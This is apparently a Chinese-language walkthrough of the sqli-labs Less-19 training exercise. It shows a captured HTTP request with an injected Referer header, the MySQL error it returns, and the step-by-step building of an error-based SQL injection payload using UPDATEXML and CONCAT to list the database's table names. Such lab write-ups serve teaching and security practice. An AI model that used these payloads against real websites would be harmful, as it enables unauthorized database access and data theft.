Less-19
- 有了18题目的经验,这道题就比较简单
- 直接bp抓包发送
POST /Less-19/ HTTP/1.1 Host: sql.alienwares.top User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 38 Origin: https://sql.alienwares.top Connection: close Referer: asa'ddd# Upgrade-Insecure-Requests: 1 uname=admin&passwd=admin&submit=Submit
You have an error in your SQL syntax;...version for the right syntax to use near 'ddd#', '117.188.186.53')' at line 1
- 返回mysql报错的结果
- mysql 语句应该为
insert into table_name values ('a','b')
- 开始sql注入语句构造
sELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE() concat(0x7e,sELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE()) #记得加( select updatexml(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1) INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP') INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (''or 1=1,'127.0.0.1')#', '$IP') INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (''or UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1),'127.0.0.1')#', '$IP') 'or UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1),'127.0.0.1')#
sql注入大功告成
